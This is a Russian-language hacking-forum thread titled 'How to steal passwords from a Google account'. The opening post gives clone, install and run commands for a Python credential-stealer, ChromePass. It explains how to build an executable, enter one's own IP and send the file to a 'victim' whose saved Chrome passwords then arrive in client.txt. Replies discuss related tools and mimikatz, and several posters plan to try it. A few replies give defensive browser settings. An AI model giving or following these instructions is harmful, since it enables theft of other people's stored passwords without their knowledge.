Мануал/Книга Как украсть пароли из аккаунта в Google

[SenjorZeroday]

Большинство пользователей хранит свои пароли прямо в браузере, в так называемых "формах автозаполнения" Chrome.

ChromePass - это специализированная утилита, написанная на языке программирования Python, способная "добывать" сохраненные пароли в Chrome.

Установка:
$ git clone https://github.com/bierschi/chromepass
$ cd chromepass
$ pip install -r requirements.txt
$ python -m pip install --upgrade pip
$ python -m pip install -r requirements.txt

Использование:
$ python create_server.py

После запуска, выбираем метод - client.exe, вводите свой IP. Если хотите, то включите сообщение об ошибке, и добавьте сообщение. Файл server-ip.exe - должна получить ваша жертва. В файле client.txt появятся пароли.

 

[unterofizier]

Стиллачок получается, попробуем-с

 

[Kohan]

https://www.nirsoft.net/utils/chromepass.html тут тоже командная строка есть

 

[scoring0]

https://www.nirsoft.net/utils/chromepass.html тут тоже командная строка есть

На новых версиях(100\101) не расшифровывает сами Value, только Cookie Name.
Так-же mimikatz перестал расшифровывать, даже с явным указанием /masterkey

 

[Stanford]

Защищаем Chrome/Chromium

Настройки - Дополнительные - Конфиденциальность и безопасность - Разрешить вход в Chrome - Отключите.

Настройки - Дополнительные - Настройки сайта - Файлы cookie - Удалять локальные данные при закрытии браузера - Включите.

 

[Stanford]

Защищаем Firefox.

Создание Мастер Пароля

По умолчанию Firefox не использует Мастер Пароли для защиты (шифрования) сохранённых имён пользователя и паролей. Чтобы установить Мастер Пароль:

1. Нажмите кнопку (три полоски), чтобы открыть панель меню.
2. Щёлкните Пароли.
3. Щёлкните (три точки), затем нажмите Настройки.
4. В меню Настройки Firefox панели Приватность и Защита перейдите к разделу Логины и Пароли.
5. Установите галочку рядом с Использовать Мастер пароль, чтобы открыть окно Сменить Мастер пароль.
6. Введите ваш Мастер Пароль два раза. Уровень качества пароля отобразит степень трудности отгадывания определённого вами пароля.

 

[tcpx51]

Excellent! I tested it and it fulfills what it promises. What I liked the most was that you can use the command line to customize certain things. This could be replicated by writing in rust?

 

[tcpx51]

Защищаем Chrome/Chromium

Настройки - Дополнительные - Конфиденциальность и безопасность - Разрешить вход в Chrome - Отключите.

Настройки - Дополнительные - Настройки сайта - Файлы cookie - Удалять локальные данные при закрытии браузера - Включите.

Settings - Advanced - Privacy and security - Allow coma login. I'm a bit confused, I didn't find this setting... you mean profile login? Could you please clarify for me, thanks!

 

[sw0rdf1sh]

cool will try this

 

[toir]

Settings - Advanced - Privacy and security - Allow coma login. I'm a bit confused, I didn't find this setting... you mean profile login? Could you please clarify for me, thanks!

Settings - You and Google - Sync and Google services - Allow Chrome sign-in

 

[tcpx51]

thanks!

Configuración - Tú y Google - Sincronización y servicios de Google - Permitir inicio de sesión en Chrome

 

[OlegMongolia]

Извините я новичок в этом деле, не могли бы подсказать как именно установить данную программу? А то ваша ссылка весьма странная, и файлов с server-ip или client.txt нету?

 

[Tom_Jerry]

отличная статья, помоему правильнее было назвать как заставить гугл поделиться пижеными паролями)))

сажусь пробовать, надеюсь еще работает.

я видел в действии подобные инструменты, всегда хотел сделать сам.